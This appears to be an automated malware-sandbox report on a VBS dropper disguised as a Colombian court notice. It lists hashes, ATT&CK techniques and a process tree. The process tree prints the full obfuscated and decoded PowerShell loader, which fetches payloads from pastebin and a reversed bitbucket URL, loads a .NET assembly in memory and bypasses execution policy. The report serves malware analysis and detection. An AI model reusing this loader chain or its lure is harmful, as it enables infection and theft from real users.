272e59a8e2a586fcefe28bdab59c1e557a935017c186804f5fd46f9079058fff

General

Target

00254-ENVIO COPIA DE LA NOTIFICACION ELECTRONICA DEMANDA JUZGADO PENAL CIRCUITO RAMA JUDICIAL/012-EN.vbs
Size

30.4MB
MD5

2063532fceeb572f8611f222dffd01ed
SHA1

f0d1938c04c06c9fa2f9f64408159f8a18404e0a
SHA256

980a6398745d8c656a7270b782d779c7328ceffa91e8bafb2020d0983ee1c1aa
SHA512

5bd582557408bd505e6c586690b12cd3a7463372c6f4aa1801c76d75dee7ad1c31a2515f3f508d875c806fc7d7f1a1e7be3e4f451029ff548346bfae0e2a3a97
SSDEEP

384:SHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPHPA:eECOzjL1

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/rE7gKnsP

exe.dropper

https://pastebin.com/raw/rE7gKnsP

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
5	1580	powershell.exe
7	1580	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
1580	powershell.exe
1592	powershell.exe
3016	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
4	pastebin.com
5	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
1592	powershell.exe
1580	powershell.exe
3016	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	Process	procid_target
PID 2104 wrote to memory of 1592	2104	WScript.exe	31
PID 2104 wrote to memory of 1592	2104	WScript.exe	31
PID 2104 wrote to memory of 1592	2104	WScript.exe	31
PID 1592 wrote to memory of 1580	1592	powershell.exe	33
PID 1592 wrote to memory of 1580	1592	powershell.exe	33
PID 1592 wrote to memory of 1580	1592	powershell.exe	33
PID 1580 wrote to memory of 3016	1580	powershell.exe	34
PID 1580 wrote to memory of 3016	1580	powershell.exe	34
PID 1580 wrote to memory of 3016	1580	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\00254-ENVIO COPIA DE LA NOTIFICACION ELECTRONICA DEMANDA JUZGADO PENAL CIRCUITO RAMA JUDICIAL\012-EN.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★cgBF★Dc★ZwBL★G4★cwBQ★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★V★Bl★Gg★dQBs★GM★a★Bl★HM★W★B4★Fg★e★B4★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★LgBz★GE★YQBv★Gk★dgBu★GU★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★DI★MQBl★H★★ZQBy★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★c★Bl★HI★Z★Bh★G8★b★Bu★Hc★bwBk★C8★ZwBy★G8★LgB0★GU★awBj★HU★YgB0★Gk★Yg★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★YQBz★GE★ZwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\00254-ENVIO COPIA DE LA NOTIFICACION ELECTRONICA DEMANDA JUZGADO PENAL CIRCUITO RAMA JUDICIAL\012-EN.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/rE7gKnsP' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''TehulchesXxXxx.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.saaoivne/sdaolnwod/21eperdaolnwod/eperdaolnwod/gro.tekcubtib//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\00254-ENVIO COPIA DE LA NOTIFICACION ELECTRONICA DEMANDA JUZGADO PENAL CIRCUITO RAMA JUDICIAL\012-EN.vbs'' , ''______asag______________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\dll02.txt

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
1KB

MD5
6cbdd377387430c01a30f811c9db7bf2

SHA1
81d8b2aad0050a5a373ac9bdfaa4766be960af3a

SHA256
ca39f66a183c13c8202648eb7b63e216839705736d387dd777f02e49480ce907

SHA512
459ce4231b8f2618ae7eb1d1056e846fbdfd34903507c6eabfd0bb730530b0d243d799e743e2261aa65b8dac97602b739df31a40ad9522824611e96a5e4565a6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4340aa0aeb7588b894979371a3a22183

SHA1
4776a71e91d02e76998041ed59c575d91b2caea7

SHA256
7a032964dc1f5f07a3903330c75c3344728b1f2fdff94a5914248de84e209abd

SHA512
a7e699470d1801e300769e69cff40c6c0de3b3f685e12f45e82cd76a48c494c87590d7c8ca7fdac5dea75a11955e5f170d477d931b3803174f978f9c00d7d85a

Download Submit
memory/1592-4-0x000007FEF687E000-0x000007FEF687F000-memory.dmp

Filesize
4KB

Download
memory/1592-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/1592-6-0x00000000005F0000-0x00000000005F8000-memory.dmp

Filesize
32KB

Download
memory/1592-7-0x000007FEF65C0000-0x000007FEF6F5D000-memory.dmp

Filesize
9.6MB

Download
memory/1592-9-0x000007FEF65C0000-0x000007FEF6F5D000-memory.dmp

Filesize
9.6MB

Download
memory/1592-25-0x000007FEF65C0000-0x000007FEF6F5D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads